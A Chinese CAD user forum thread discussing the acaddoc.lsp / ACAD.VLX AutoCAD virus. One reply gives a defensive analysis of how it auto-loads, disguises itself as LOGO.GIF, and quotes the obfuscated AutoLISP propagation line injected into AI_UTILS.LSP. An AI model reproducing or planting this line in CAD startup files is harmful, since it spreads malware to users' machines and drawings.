acaddoc.lsp病毒破防（重磅解析源码级别）

mjz521yy · 发表于 2014-12-1 16:24

我以前都是设置只读来防御的

三尖树之觉醒 · 发表于 2015-10-30 16:06

作者不错欧，有时间可以教教我么。

guohq · 发表于 2015-11-11 09:15

再来一贴：
病毒载体文件：ACAD.VLX。该文件本身为 ACAD的自动加载机制的一个固定名称的自动加载文件，病毒伪装成合法文件搞鬼。
感染方式：打开一幅DWG时，ACAD.VLX 如与DWG在一个目录，则ACAD.VLX被自动加载；
      加载后动作：
         (1) 将自身复制为 {ACADSysPath}\Help\ LOGO.GIF，伪装成图片文件。
         (2) 寻找另一个自动加载文件（优先级比自身高?），如AI_UTILS.LSP，将一行代码嵌入其中，代码行为：
      (vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))
      意为将 LOGO.GIF 拷贝为 ACAD.VLX（且复制的目标路径为CAD的当前路径），作用为完成自身复制，用于传染。

破坏性：ACAD.VLX本身为自动加载文件，会屏蔽系统的其它自动加载文件。

林霄云 · 发表于 2015-11-11 10:55

guohq 发表于 2015-11-11 09:15
再来一贴：
病毒载体文件：ACAD.VLX。该文件本身为 ACAD的自动加载机制的一个固定名称的自动加载文件，病毒 ...

厉害、我也就年轻的时候瞎折腾。鄙人拙作是极不专业的，我是设计师。

水仙的错 · 发表于 2019-9-8 19:47

下载下来看看，不知道能不能防毒

ljxkm · 发表于 2019-9-8 22:13

有病毒杀就完了，没必要说的那么透，双刃剑哈

水仙的错 · 发表于 2019-9-14 21:56

感谢分享，照顾周到

账号		自动登录	找回密码
密码			注册

[讨论] acaddoc.lsp病毒破防（重磅解析源码级别）